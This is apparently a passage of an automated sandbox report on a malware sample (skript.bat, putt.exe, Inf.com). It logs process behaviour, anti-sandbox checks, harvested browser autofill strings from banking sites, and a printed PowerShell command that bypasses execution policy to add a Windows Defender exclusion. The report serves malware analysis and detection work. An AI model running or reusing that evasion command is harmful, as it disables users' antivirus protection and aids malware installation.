                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5415Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4371Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4485Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5282Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comAPI coverage: 3.9 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 5415 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 4371 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1828Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Windows\System32\timeout.exe TID: 7236Thread sleep count: 86 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 4485 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 5282 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7884Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406301 FindFirstFileW,FindClose,14_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075DC54
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A087
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_0076A1E2
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_0075E472
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_0076A570
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072C622 FindFirstFileExW,26_2_0072C622
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007666DC FindFirstFileW,FindNextFileW,FindClose,26_2_007666DC
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00767333 FindFirstFileW,FindClose,26_2_00767333
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_007673D4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075D921
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,26_2_006F5FC8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: Web Data.35.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Web Data.35.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: Web Data.35.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Web Data.35.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: svchost.exe, 0000000D.00000002.3403220167.0000027D1D058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3398154367.0000027D17A2B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3403862698.0000000003F85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Web Data.35.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: msedge.exe, 00000022.00000003.3307932825.00007CC800324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                    Source: Inf.com, 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                    Source: Web Data.35.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: powershell.exe, 00000009.00000002.2490118341.000002549A450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWft T%SystemRoot%\system32\mswsock.dll
                    Source: Web Data.35.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: chrome.exe, 00000020.00000003.3172505293.000002740CC1A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3388224329.0000024C69443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Web Data.35.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Web Data.35.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Web Data.35.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: Web Data.35.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: Web Data.35.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Web Data.35.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Web Data.35.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: Web Data.35.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: Web Data.35.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: Web Data.35.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Web Data.35.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: Web Data.35.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076F4FF BlockInput,26_2_0076F4FF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,26_2_006F338B
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_00406328
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00715058 mov eax, dword ptr fs:[00000030h]26_2_00715058
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,26_2_007520AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00722992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00722992
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00710BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00710BAF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00710D45 SetUnhandledExceptionFilter,26_2_00710D45
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00710F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00710F91

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: skript.bat, type: SAMPLE
                    Source: Yara matchFile source: amsi64_7456.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Maps a DLL or memory area into another process
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00751B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,26_2_00751B4D
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,26_2_006F338B
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075BBED SendInput,keybd_event,26_2_0075BBED
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075EC6C mouse_event,26_2_0075EC6C
